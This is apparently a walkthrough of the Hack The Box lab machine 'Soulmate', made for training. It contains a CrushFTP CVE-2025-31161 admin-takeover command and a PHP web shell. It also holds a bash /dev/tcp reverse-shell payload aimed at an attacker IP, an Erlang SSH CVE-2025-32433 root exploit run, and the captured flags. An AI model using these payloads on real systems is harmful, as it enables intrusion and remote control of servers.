Soulmate - Hack The Box Machine

Septmeber 2025

---

User Flag

While scanning for subdomains, found the ftp subdomain that was running an instance of CrushFTP on a vulnerable version:

CVE-2025-31161

Running the exploit with the command:

python3 cve-2025-31161.py --target_host "ftp.soulmate.htb" --port 80 --target_user crushadmin --new_user pelele --password pelele

We take advantage of the crushadmin default user to create a new user with credentials pelele:pelele

Login and go to the Admin interface, in the User Management tab and change ben's credentials. This user is able to upload files to the server. Upload a shell on this user's files inside webProd:

<?php echo system($_GET['c']); ?>

Access it on:

http://soulmate.htb/shell.php?c=bash -c 'exec bash -i %26>%2Fdev%2Ftcp%2F10.10.16.107%2F4444 <%261'

Get a reverse shell as www-data.

List ports with LinPeas:

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
tcp        0      0 127.0.0.1:9090          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1149/nginx: worker
tcp        0      0 127.0.0.1:2222          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:45109         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4369          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:46589         0.0.0.0:*               LISTEN      -
tcp6       0      0 ::1:4369                :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      1149/nginx: worker
tcp6       0      0 :::22                   :::*                    LISTEN      -

On port 2222:

nc localhost 2222
SSH-2.0-Erlang/5.2.9

This version is vulnerable to CVE-2025-32433

python3 CVE-2025-32433.py
[*] Connecting to SSH server...
[+] Received banner: SSH-2.0-Erlang/5.2.9
12`|g"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-s,kex-strict-s-v00@openssh.com9ssh-ed25519,ecdsa-sha2-nistp256,rsa-sha2-512,rsa-sha2-256aes256-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-gcm@openssh.com,aes128-ctr,chacha20-poly1305@openssh.com,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbcaes256-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-gcm@openssh.com,aes128-ctr,chacha20-poly1305@openssh.com,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc{hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-sha1-etm@openssh.com,hmac-sha1{hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-sha1-etm@openssh.com,hmac-sha1none,zlib@openssh.com,zlibnone,zlib@openssh.com,zlib
[*] Sending SSH_MSG_KEXINIT...
[*] Sending SSH_MSG_CHANNEL_OPEN...
[*] Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
[✓] Exploit sent! If the server is vulnerable, it should have written to /lab.txt.
[+] Received response: 000000000000d4b0cfa302073dfe

This way, I got a shell as root and bypassed the first user exploit and got through to root in one step.

root@soulmate:/# cat /home/ben/user.txt
cat /home/ben/user.txt
c22c9116f1d2daaea0aec8406c4870bd
root@soulmate:/# cat /root/root.txt
cat /root/root.txt
e737606e7878c79fa43a9980c99e15d7